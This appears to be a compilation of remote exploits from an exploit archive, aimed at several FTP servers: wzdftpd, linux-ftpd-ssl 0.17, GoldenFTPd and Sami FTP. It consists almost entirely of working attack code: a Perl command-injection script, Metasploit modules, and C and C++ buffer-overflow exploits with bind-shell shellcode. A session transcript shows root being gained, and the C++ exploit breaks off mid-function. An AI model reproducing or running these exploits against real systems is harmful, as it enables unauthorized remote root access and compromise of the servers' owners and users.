# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
# .___ _____ __ .___
#__ _ __________ __| _// ____\/ |_______ __| _/
#\ \/ \/ /\___ // __ |\ __\\ __\____ \ / __ |
# \ / / // /_/ | | | | | | |_> > /_/ |
# \/\_/ /_____ \____ | |__| |__| | __/\____ |
# \/ \/ |__| \/
#
#__ _ _______ _______ ____ ________
#\ \/ \/ /\__ \\_ __ \_/ __ \\___ /
# \ / / __ \| | \/\ ___/ / /
# \/\_/ (____ /__| \___ >_____ \
# \/ \/ \/ VER1
################################################## ####
use Net::FTP;
sub usage {
print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_command\n"
."default guest account for wzdftpd is username/password: guest/%\n";
}
print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!
";
if ($#ARGV < 4) {
usage();
exit();
}
$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];
$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
or die "Cannot connect to $host: $@";
$ftp->login($user, $pass)
or die "Cannot login ", $ftp->message;
print "Now you can type commands, hopefully as r00t!\n";
while(1) {
print "!\$%&#>";
$cmd=<stdin>;
$ftp->site($sitecmd, "|$cmd;");
print $ftp->message();
}
# [2005-09-24]
21 WzdFTPD <= 0.5.4 (SITE) Remote Command Execution Exploit (meta)
# Reference: http://www.enigmagroup.org/id.php?id=1231 (kcope) /str0ke
#
# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution
# 2005 11 26 - David Maciejak
#
package Msf::Exploit::wzdftpd_site;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'Wzdftpd SITE Command Arbitrary Command Execution',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'David Maciejak <david dot maciejak at kyxar dot fr>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'guest'],
'PASS' => [1, 'DATA', 'Password', '%'],
'SITECMD'=> [1, 'DATA', 'Custom site command'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary command execution vulnerability in Wzdftpd
threw SITE command. Wzdftpd version to 0.5.4 are vulnerable.
}),
'Refs' =>
[
['BID', '14935'],
],
'Payload' =>
{
'Space' => 128,
'Keys' => ['cmd','cmd_bash'],
},
'Keys' => ['wzdftpd_site'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
my $res = $s->Recv(-1, 5);
$s->Close();
if (! $res) {
$self->PrintLine(" No FTP banner");
return $self->CheckCode('Unknown');
}
if ($res =~ /220 wzd server ready/)
{
$self->PrintLine(" FTP Server is a wzdftpd server");
return $self->CheckCode('Appears');
}
else
{
$self->PrintLine(" FTP Server is probably not vulnerable");
return $self->CheckCode('Safe');
}
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $custom_site_cmd=$self->GetVar('SITECMD');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $cmd = $encodedPayload->RawPayload;
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError){
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(" Establishing a connection to the FTP server ...");
$s->Send("USER ".$user);
my $result = $s->Recv(-1, 20);
if (!($result=~/\d{3} User .+ okay, need password/))
{
$self->PrintLine(" Invalid user");
return;
}
$s->Send("PASS ".$pass);
$result = $s->Recv(-1, 20);
if (!($result=~/\d{3} User logged in/))
{
$self->PrintLine(" Invalid password");
return;
}
$s->Send("SITE ".$custom_site_cmd." | $cmd;");
$result = $s->Recv(-1, 20);
if (!($result=~/^200/))
{
$self->PrintLine(" Error: $result");
return;
}
$self->PrintLine('');
my @results = split ( /\n/, $result );
chomp @results;
for (my $i = 1; $i < @results -1; $i++){
$self->PrintLine("$results[$i]");
}
return;
}
1;
# [2005-11-04]
21 linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit
/*Oct2005 VER2*/
/************************************************** ********/
/** lnxFTPDssl_warez.c **/
/** linux-ftpd-ssl 0.17 remote r00t exploit by kcope **/
/** for all of those who installed the ssl ready version **/
/** of linux-ftpd to be more "secure" **/
/** **/
/** be aware of the buffer overflows, **/
/** the code is strong cryto **/
/************************************************** ********/
/** thanx blackzero,revoguard,wY!,net_spy **/
/** Confidential. Keep Private! **/
/************************************************** ********/
/**
C:\Dokumente und Einstellungen\Administrator\Desktop>telnet 192.168.2.9 21
220 localhost.localdomain FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready.
AUTH SSL
234 AUTH SSL OK.
;PpPpPPpPPPpPPPPpPppPPPPPpPpPPPpPPpPpPPpPPPpPPPPpP ppPPPPPpPpPPPpP
C:\Dokumente und Einstellungen\Administrator\Desktop>lnxFTPDssl_warez.exe 192.168.2.9 kcope password
lnxFTPDssl_warez.c
linux-ftpd-ssl 0.17 remote r00t exploit by kcope
connecting to 192.168.2.9:21... ok.
OK - STARTING ATTACK
+++ USING STACK ADDRESS 0xbfffcc03 +++
+++ USING STACK ADDRESS 0xbfffcc13 +++
+++ USING STACK ADDRESS 0xbfffcc23 +++
+++ USING STACK ADDRESS 0xbfffcc33 +++
+++ USING STACK ADDRESS 0xbfffcc43 +++
+++ USING STACK ADDRESS 0xbfffcc53 +++
+++ USING STACK ADDRESS 0xbfffcc63 +++
+++ USING STACK ADDRESS 0xbfffcc73 +++
+++ USING STACK ADDRESS 0xbfffcc83 +++
+++ USING STACK ADDRESS 0xbfffcc93 +++
+++ USING STACK ADDRESS 0xbfffcca3 +++
+++ USING STACK ADDRESS 0xbfffccb3 +++
+++ USING STACK ADDRESS 0xbfffccc3 +++
+++ USING STACK ADDRESS 0xbfffccd3 +++
+++ USING STACK ADDRESS 0xbfffcce3 +++
+++ USING STACK ADDRESS 0xbfffccf3 +++
+++ USING STACK ADDRESS 0xbfffcd03 +++
+++ USING STACK ADDRESS 0xbfffcd13 +++
+++ USING STACK ADDRESS 0xbfffcd23 +++
+++ USING STACK ADDRESS 0xbfffcd33 +++
+++ USING STACK ADDRESS 0xbfffcd43 +++
+++ USING STACK ADDRESS 0xbfffcd53 +++
+++ USING STACK ADDRESS 0xbfffcd63 +++
+++ USING STACK ADDRESS 0xbfffcd73 +++
+++ USING STACK ADDRESS 0xbfffcd83 +++
+++ USING STACK ADDRESS 0xbfffcd93 +++
+++ USING STACK ADDRESS 0xbfffcda3 +++
+++ USING STACK ADDRESS 0xbfffcdb3 +++
+++ USING STACK ADDRESS 0xbfffcdc3 +++
+++ USING STACK ADDRESS 0xbfffcdd3 +++
+++ USING STACK ADDRESS 0xbfffcde3 +++
+++ USING STACK ADDRESS 0xbfffcdf3 +++
+++ USING STACK ADDRESS 0xbfffce03 +++
+++ USING STACK ADDRESS 0xbfffce13 +++
+++ USING STACK ADDRESS 0xbfffce23 +++
+++ USING STACK ADDRESS 0xbfffce33 +++
+++ USING STACK ADDRESS 0xbfffce43 +++
+++ USING STACK ADDRESS 0xbfffce53 +++
+++ USING STACK ADDRESS 0xbfffce63 +++
+++ USING STACK ADDRESS 0xbfffce73 +++
+++ USING STACK ADDRESS 0xbfffce83 +++
+++ USING STACK ADDRESS 0xbfffce93 +++
+++ USING STACK ADDRESS 0xbfffcea3 +++
+++ USING STACK ADDRESS 0xbfffceb3 +++
+++ USING STACK ADDRESS 0xbfffcec3 +++
Let's get ready to rumble!
id
uid=0(root) gid=0(root) egid=1000(kcope) groups=1000(kcope),20(dialout),24(cdrom
),25(floppy),29(audio),44(video),46(plugdev)
uname -a
Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
**/
// Tested on Linux 2.4.18-14 Redhat 8.0
// Linux 2.2.20-idepci Debian GNU 3.0
// Linux 2.4.27-2-386 Debian GNU 3.1
// CHECK VER3 FOR MORE SUPPORT!!!
// ***KEEP IT ULTRA PRIV8***
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>
#define BUF_SIZ 4096
#define PORT 21
#define BINDPORT 30464
#define STACK_START 0xbfffcc03
#define STACK_END 0xbffff4f0
/*my shellcode*/
/*setreuid,chroot break,
bind to port 30464, 0xff is double*/
unsigned char lnx_bind[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x70\x31\xC0\x31\xDB\x31\xC9"
"\xB0\x46\xCD\x80\x5E\x90\xB8\xBE"
"\xff\xff\xff\xff\xff\xff\xF7\xD0"
"\x89\x06\xB0\x27\x8D\x1E\xFE\xC5"
"\xB1\xED\xCD\x80\x31\xC0\x8D\x1E"
"\xB0\x3D\xCD\x80\x66\xB9\xff\xff"
"\x03\xBB\xD2\xD1\xD0\xff\xff\xF7"
"\xDB\x89\x1E\x8D\x1E\xB0\x0C\xCD"
"\x80\xE2\xEF\xB8\xD1\xff\xff\xff"
"\xff\xff\xff\xF7\xD0\x89\x06\xB0"
"\x3D\x8D\x1E\xCD\x80\x31\xC0\x31"
"\xDB\x89\xF1\xB0\x02\x89\x06\xB0"
"\x01\x89\x46\x04\xB0\x06\x89\x46"
"\x08\xB0\x66\x43\xCD\x80\x89\xF1"
"\x89\x06\xB0\x02\x66\x89\x46\x0C"
"\xEB\x04\xEB\x74\xEB\x77\xB0\x77"
"\x66\x89\x46\x0E\x8D\x46\x0C\x89"
"\x46\x04\x31\xC0\x89\x46\x10\xB0"
"\x10\x89\x46\x08\xB0\x66\x43\xCD"
"\x80\xB0\x01\x89\x46\x04\xB0\x66"
"\xB3\x04\xCD\x80\x31\xC0\x89\x46"
"\x04\x89\x46\x08\xB0\x66\xB3\x05"
"\xCD\x80\x88\xC3\xB0\x3F\x31\xC9"
"\xCD\x80\xB0\x3F\xB1\x01\xCD\x80"
"\xB0\x3F\xB1\x02\xCD\x80\xB8\xD0"
"\x9D\x96\x91\xF7\xD0\x89\x06\xB8"
"\xD0\x8C\x97\xD0\xF7\xD0\x89\x46"
"\x04\x31\xC0\x88\x46\x07\x89\x76"
"\x08\x89\x46\x0C\xB0\x0B\x89\xF3"
"\x8D\x4E\x08\x8D\x56\x0C\xCD\x80"
"\xE8\x15\xff\xff\xff\xff\xff\xff";
long ficken() {
printf("lnxFTPDssl_warez.c\nlinux-ftpd-ssl 0.17 remote r00t exploit by kcope\n\n");
return 0xc0debabe;
}
void usage(char **argv) {
printf("Insufficient parameters given.\n");
printf("Usage: %s <remotehost> <user> <pass> [writeable directory]\n", argv[0]);
exit(0);
}
void _recv(int sock, char *buf) {
int bytes=recv(sock, buf, BUFSIZ, 0);
if (bytes < 0) {
perror("read() failed");
exit(1);
}
}
void attack(int sock, unsigned long ret, char *pad) {
int i,k;
char *x=(char*)malloc(1024);
char *bufm=(char*)malloc(1024);
char *bufc=(char*)malloc(1024);
char *rbuf=(char*)malloc(BUFSIZ+10);
char *nops=(char*)malloc(1024);
unsigned char a,b,c,d;
memset(nops,0,1024);
memset(nops,0x90,255);
memset(x,0,1024);
for (i=0,k=0;i<60;i++) {
a=(ret >> 24) & 0xff;
b=(ret >> 16) & 0xff;
c=(ret >> 8) & 0xff;
d=(ret) & 0xff;
if (d==255) {
x[k]=d;
x[++k]=255;
} else {
x[k]=d;
}
if (c==255) {
x[k+1]=c;
x[++k+1]=255;
} else {
x[k+1]=c;
}
if (b==255) {
x[k+2]=b;
x[++k+2]=255;
} else {
x[k+2]=b;
}
if (a==255) {
x[k+3]=a;
x[++k+3]=255;
} else {
x[k+3]=a;
}
k+=4;
}
snprintf(bufm, 1000, "MKD %s%s\r\n", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1
snprintf(bufc, 1000, "CWD %s%s\r\n", pad, x);
for (i=0; i<11; i++) {
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}
for (i=0; i<2; i++) {
snprintf(bufm, 1000, "MKD %s\r\n", lnx_bind);
snprintf(bufc, 1000, "CWD %s\r\n", lnx_bind);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
snprintf(bufm, 1000, "MKD %s\r\n", nops);
snprintf(bufc, 1000, "CWD %s\r\n", nops);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}
send(sock, "XPWD\r\n", strlen("XPWD\r\n"), 0);
free(bufm);
free(bufc);
free(x);
free(rbuf);
}
int do_remote_shell(int sockfd)
{
while(1)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sockfd,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
{
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds))
{
if((cnt=read(0,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(sockfd,buf,cnt);
}
if(FD_ISSET(sockfd,&fds))
{
if((cnt=read(sockfd,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(1,buf,cnt);
}
}
}
}
int do_connect (char *remotehost, int port) {
struct hostent *host;
struct sockaddr_in addr;
int s;
if (!inet_aton(remotehost, &addr.sin_addr))
{
host = gethostbyname(remotehost);
if (!host)
{
perror("gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
if (port == PORT) perror("connect() failed");
return -1;
}
return s;
}
void do_login(int s, char *buf, char *sendbuf, char *user, char *pass) {
memset(buf, 0, sizeof(buf));
memset(sendbuf, 0, sizeof(sendbuf));
do {
_recv(s, buf);
} while (strstr(buf, "220 ") == NULL);
snprintf(sendbuf, BUFSIZ, "USER %s\r\n", user);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "331 ") == NULL);
snprintf(sendbuf, BUFSIZ, "PASS %s\r\n", pass);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "230 ") == NULL);
}
int main(int argc, char **argv) {
char remotehost[255];
char user[255];
char pass[255];
char pad[10];
char *buf,*sendbuf;
int stackaddr=STACK_START;
int s,sr00t,i;
ficken();
if (argc < 4)
usage(argv);
strncpy(remotehost, argv[1], sizeof(remotehost));
remotehost[sizeof(remotehost)-1]=0;
strncpy(user, argv[2], sizeof(user));
user[sizeof(user)-1]=0;
strncpy(pass, argv[3], sizeof(pass));
pass[sizeof(pass)-1]=0;
printf("connecting to %s:%d...", remotehost, PORT);
fflush(stdout);
s=do_connect(remotehost, PORT);
puts(" ok.");
buf=(char*)malloc(BUFSIZ+10);
sendbuf=(char*)malloc(BUFSIZ+10);
do_login(s, buf, sendbuf, user, pass);
if (strstr(buf, "230")!=NULL) {
printf("OK - STARTING ATTACK\n");
i=0;
while (stackaddr <= STACK_END) {
printf("+++ USING STACK ADDRESS 0x%.08x +++\n", stackaddr);
sleep(1);
if (i==1) {
strcpy(pad, "A");
}
if (i==2) {
strcpy(pad, "AA");
}
if (i==3) {
strcpy(pad, "AAA");
i=0;
}
attack(s, stackaddr, pad);
close(s);
s=do_connect(remotehost, PORT);
do_login(s, buf, sendbuf, user, pass);
if (argv[4] != NULL) {
snprintf(sendbuf, BUFSIZ, "CWD %s\r\n", argv[4]);
send(s, sendbuf, strlen(sendbuf), 0);
recv(s, buf, BUFSIZ, 0);
}
if((sr00t=do_connect(remotehost, BINDPORT)) > 0) {
/* XXX Remote r00t */
printf("\nLet's get ready to rumble!\n");
do_remote_shell(sr00t);
exit(0);
}
stackaddr+=16;
i++;
}
} else {
printf("\nLogin incorrect\n");
exit(1);
}
free(buf);
free(sendbuf);
return 0;
}
// [2005-11-05]
21 Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)
##
# Written by Tim Shelton [[email protected]]
# GoldenFTPd
##
package Msf::Exploit::goldenftpd_appe;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'GoldenFTPd APPE <= 1.92 Stack Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Tim Shelton <redsand [at] redsand.net>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'anonymous'],
'PASS' => [1, 'DATA', 'Password', 'metasploit@'],
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the GoldenFTPd
server. The flaw is triggered when a APPE command is received
with a specially crafted overly-long argument. This vulnerability
affects all versions of GoldenFTPd prior to 1.92 and was discovered by
Tim Shelton.
}),
'Refs' =>
[
['RED-NET', '2005-11-14-01'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['GoldenFTPd Server <= 1.92 Universal', 0x99998888, 0x11111111, 0x98d855eb, 0x0044395F],
],
'Keys' => ['goldenftp'],
'DisclosureDate' => 'NONE',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(30)) {
$self->PrintLine(" Failed to initialize the NOP module.");
return;
}
# my $shellcode = "\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe";
my $evil = ("APPE /");
$evil .= ("A/")x120;
$evil .= (pack("V",$target->[3])) x 4;
$evil .= (pack("V",$target->[1]) . pack("V",$target->[2]) . pack("V",$target->[4]) . pack("V", $target->[1]) ) x 4;
$evil .= $self->MakeNops(30);
$evil .= $shellcode;
$evil .= "\x0a\x0d";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
$self->PrintLine(sprintf (" Universal GoldenFTPd 1.93 Exploit by redsand\n"));
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(sprintf (" Trying ".$target->[0]." using return address 0x%.8x....", $target->[4]));
my $r = $s->Recv(-1, 30);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
($r) = $r =~ m/^([^\n\r]+)(\r|\n)/;
$self->PrintLine(" $r");
$self->PrintLine(" Login as " .$self->GetVar('USER'). "/" .$self->GetVar('PASS'));
$s->Send("USER ".$self->GetVar('USER')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$s->Send("PASS ".$self->GetVar('PASS')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->PrintLine(" Sending evil buffer....");
$s->Send($evil);
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print(" $r");
return;
}
# [2005-12-20]
21 Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (meta)
##
# Written by redsand
#
# This is simple, look for a {call,jmp} esp
##
package Msf::Exploit::pmsoftware_samftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PMSoftware Samftpd Remote Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ '<redsand [at] blacksecurity.org>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'redsand0wnedj00'],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
# 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the log handler of Samftpd
}),
'Refs' =>
[
['SA18574', 'secunia.com/advisories/SA18574'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['SamFtpd PmSoftware.exe WinXP SP0/1 Eng.', 0x71ab7bfb],
['SamFtpd PmSoftware.exe WinXP SP2 Eng.', 0x77daaccf],
],
'Keys' => ['samftpd'],
'DisclosureDate' => 'Jan 25 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $header = "\x81\xc4\xff\xef\xff\xff\x44";
if (! $self->InitNops(30)) {
$self->PrintLine(" Failed to initialize the NOP module.");
return;
}
my $evil = ("PASS ");
$evil .= "A"x219;
$evil .= pack("V", $target->[1]) x 5 ;
$evil .= "\x90\x90" x 5; # little bit of padding
$evil .= $shellcode;
$evil .= "\x0a\x0d";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
$self->PrintLine(sprintf (" PMSoftware Samftpd Remote Exploit by redsand\@blacksecurity.org"));
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
#$self->PrintLine(sprintf (" Trying ".$target->[0]." using return address 0x%.8x....", $target->[4]));
my $r = $s->Recv(-1, 30);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
($r) = $r =~ m/^([^\n\r]+)(\r|\n)/;
$self->PrintLine(" $r");
$self->PrintLine(" Login as " .$self->GetVar('USER'));
$s->Send("USER ".$self->GetVar('USER')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->PrintLine(" Sending evil buffer....");
$s->Send($evil);
#$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print(" $r");
return;
}
# [2006-01-25]
21 Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)
// Two includes.
#include <fstream.h>
#include <winsock2.h>
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib'
#pragma comment(lib, "ws2_32")
char MyShellCode[] = // XOR by \x99\x99\x99\x99.
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x 73\x17\x99\x99"
"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
"\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x 3D\x83\xE9\x5E"
"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\x E7\x41\x7B\xEA"
"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\x AA\xAB\xB7\xDD"
"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\x A9\xC0\xFD\x12"
"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x 95\x14\xCE\xB5"
"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC7\x 98\x77\xF3\x93"
"\xC0\x12\xE4\x99\x19\x60\x9F\xED\x7D\xC8\xCA\x66\x AD\x16\x71\x09"
"\x99\x99\x99\xC0\x10\x9D\x17\x7B\x72\xA8\x66\xFF\x 18\x75\x09\x98"
"\xCD\xF1\x98\x98\x99\x99\x66\xCC\xB9\xCE\xCE\xCE\x CE\xDE\xCE\xDE"
"\xCE\x66\xCC\x85\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x 99\x9A\x90\x10"
"\x7F\xF3\x89\xCF\xCA\x66\xCC\x81\xCE\xCA\x66\xCC\x 8D\xCE\xCF\xCA"
"\x66\xCC\x89\x10\x5B\xFF\x18\x75\xCD\x99\x14\xA5\x BD\xA8\x59\xF3"
"\x8C\xC0\x6A\x32\x10\x4E\x5F\xDD\xBD\x89\xDD\x67\x DD\xBD\xA4\x10"
"\xE5\xBD\xD1\x10\xE5\xBD\xD5\x10\xE5\xBD\xC9\x14\x DD\xBD\x89\xCD"
"\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEC\x99\x C8\x66\xCC\xA9"
"\x10\x78\xF1\x66\x66\x66\x66\x66\xA8\x66\xCC\xB5\x CE\x66\xCC\x95"
"\x66\xCC\xB1\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\x DC\xA5\x12\xCD"
"\x9C\xE1\x98\x73\x12\xD3\x81\x12\xC3\xB9\x98\x72\x 7A\xAB\xD0\x12"
"\xAD\x12\x98\x77\xA8\x66\x65\xA8\x59\x35\xA1\x79\x ED\x9E\x58\x56"
"\x94\x98\x5E\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\x C3\xBD\x98\x72"
"\xFF\x12\x95\xD2\x12\xC3\x85\x98\x72\x12\x9D\x12\x 98\x71\x72\x9B"
"\xA8\x59\x10\x73\xC6\xC7\xC4\xC2\x5B\x91\x99";
static char PayLoad[1329];
int IP;
int Port;
int szNOP1, szNOP2;
int Nop;
// Jump ESP by library User32 on Win2000 SP4 fr..
char JmpESP[] = "\x0C\xED\xE3\x77";
// Flag ID server Sami FTP.
char TargetFlag[] = "220-\r\n220 Features p a .";
char RecvBuff[200];
void usage(){
cout<<" "<<endl;
cout<<"USAGE : ThisAppz [Target IP] [Port to connect FTP]" <<endl;
cout<<"If a port isnt specified, default port will 21." <<endl;
cout<<"Without IP, the Xploit run in local mode [127.0.0.1]"<<endl;
cout<<" "<<endl;
return;}
void Info(){
cout<<" "<<endl;
cout<<" ============================================== v1.0 =="<<endl;
cout<<" ====== Sami FTP Remote Buffer Overflow Exploit ======"<<endl;
cout<<" ================== Coded by HolyGhost ================"<<endl;
cout<<" ====== Distributed for educational purposes only ====="<<endl;
cout<<" ================== [email protected] ================"<<endl;
cout<<" ================================================== ===="<<endl;
cout<<" "<<endl;}
int main(int argc,char *argv[]){
Info();
if ( ( argc > 3 ) ){usage();return -1;}
if( argc > 1 ){
cout<<"argv[1]"<<"\t"<<argv[1]<<endl;
IP = htonl( inet_addr( argv[1] ) );}
else{
cout<<"Local test mode : 127.0.0.1"<<endl;
IP = htonl( inet_addr( "127.0.0.1" ) );}
if( argc == 3 ){
cout<<"argv[2]"<<"\t"<<argv[2]<<endl;
Port = atoi( argv[2] );}
else{
cout<<"Port by default : 21"<<endl;
Port = 21;}
WSADATA wsadata;
if( WSAStartup( MAKEWORD( 2, 0 ),&wsadata )!=0 ){
cout<<"[-] WSAStartup error. Bye!"<<endl;
return -1;}
SOCKET sck;
fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
sck = socket( AF_INET, SOCK_STREAM, 0 ); // TCP.
if( sck == -1 ){cout<<"[-] Socket() error. Bye!"<<endl; return -1;}
server.sin_family = AF_INET; // Address Internet 4 bytes.
server.sin_addr.s_addr = htonl( IP );
server.sin_port = htons( Port ); // Definition port.
// Try to connect on FTP server.
connect( sck,( struct sockaddr *)&server, sizeof( server ) );
timeout.tv_sec = 3; // Delay 3 seconds.
timeout.tv_usec = 0;
FD_ZERO( &mask );
FD_SET( sck, &mask );
switch( select( sck + 1, NULL, &mask, NULL, &timeout ) ){
case -1:{ // Problem!
cout<<"[-] Select() error. Bye!"<<endl;
closesocket( sck );
return -1;}
case 0:{ // Problem!
cout<<"[-] Connect() error. Bye!"<<endl;
closesocket( sck );
return -1;}
default:
if(FD_ISSET( sck, &mask ) ){
recv( sck, RecvBuff, 256, 0 ); // Reception Flag ID.
cout<<"[+] Connected, checking the server for flag..."<<endl;
Sleep( 500 );
if ( !strstr( RecvBuff, TargetFlag ) ){
cout<<"[-] This is not a valid flag from target! Bye."<<endl;
return -1;} // Bye!
cout<<RecvBuff;
Sleep( 1000 );
